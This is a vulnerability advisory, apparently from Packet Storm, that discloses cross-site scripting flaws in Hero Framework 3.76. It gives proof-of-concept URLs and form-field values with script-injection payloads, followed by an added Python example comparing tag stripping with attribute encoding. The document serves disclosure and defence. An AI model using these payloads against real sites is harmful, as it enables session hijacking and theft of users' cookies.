Hero Framework 3.76 Cross Site Scripting

2013-01-11T00:00:00
ID PACKETSTORM:119470
Type packetstorm
Reporter Stefan Schurtz
Modified 2013-01-11T00:00:00

Description

                                        
  
Advisory: Hero Framework 3.76 Multiple Cross-site Scripting vulnerabilities  
Advisory ID: SSCHADV2012-023  
Author: Stefan Schurtz  
Affected Software: Successfully tested on Hero Framework 3.76  
Vendor URL: http://www.heroframework.com/  
Vendor Status: informed  
  
===========================  
Vulnerability Description  
===========================  
  
Hero Framework 3.76 is prone to multiple Cross-Site Scripting vulnerabilities.  
  
======================  
PoC-Exploit  
======================  
  
http://[target]/hero_os/users/login?errors=true&username='"></style></script><script>alert(document.cookie)</script>  
http://[target]/hero_os/search?q=" onmouseover%3dalert(/XSS/) %3d"  
http://[target]/hero_os/users/login?errors=true&username=" onmouseover%3dalert(/XSS/) %3d"  
  
// POST-Parameter  
  
Username: '"><script>alert(document.cookie)</script>  
First Name: '"><script>alert(document.cookie)</script>  
Last Name: '"><script>alert(document.cookie)</script>  
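
Added example (not part of the advisory and not Hero Framework code): the two payload shapes above, placed into a hypothetical `<input value="...">` template, show why removing tags alone does not stop the quote-only `onmouseover` variant while encoding the value for the attribute context neutralises both. The template, function names and the tag-stripping regex are assumptions made for illustration.

```python
import html
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# Values from the advisory's PoC lines; the second is URL-decoded first.
TAG_PAYLOAD = "'\"></style></script><script>alert(document.cookie)</script>"
ATTR_PAYLOAD = unquote('" onmouseover%3dalert(/XSS/) %3d"')

FIELD = '<input type="text" name="username" value="{}">'  # hypothetical template
EXPECTED_ATTRS = {"type", "name", "value"}


def render_raw(value):
    """Reflect the value unencoded (the behaviour the PoC relies on)."""
    return FIELD.format(value)


def render_tag_stripped(value):
    """Incomplete fix: drop anything tag-shaped, leave quotes untouched."""
    return FIELD.format(re.sub(r"<[^>]*>", "", value))


def render_encoded(value):
    """Encode &, <, >, " and ' before placing the value in the attribute."""
    return FIELD.format(html.escape(value, quote=True))


class _Audit(HTMLParser):
    def __init__(self):
        super().__init__()
        self.unexpected = []   # tags/attributes the template never emits
        self.value = None      # the field value as an HTML parser sees it

    def handle_starttag(self, tag, attrs):
        if tag != "input":
            self.unexpected.append("<" + tag + ">")
        for name, val in attrs:
            if name not in EXPECTED_ATTRS:
                self.unexpected.append(name)
            elif name == "value" and self.value is None:
                self.value = val


def audit(markup):
    """Return (unexpected tags/attributes, parsed field value)."""
    parser = _Audit()
    parser.feed(markup)
    parser.close()
    return parser.unexpected, parser.value
```

`audit()` returns the unexpected tags or attributes and the parsed field value; only `render_encoded()` yields an empty list and the original string for both payloads.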
  
======================  
Solution  
======================  
  
- -  
  
======================  
Disclosure Timeline  
======================  
  
16-Dec-2012 - informed via contact form  
16-Dec-2012 - feedback from vendor  
  
======================  
Credits  
======================  
  
Vulnerabilities found and advisory written by Stefan Schurtz.  
  
======================  
References  
======================  
  
http://www.darksecurity.de/advisories/2012/SSCHADV2012-023.txt  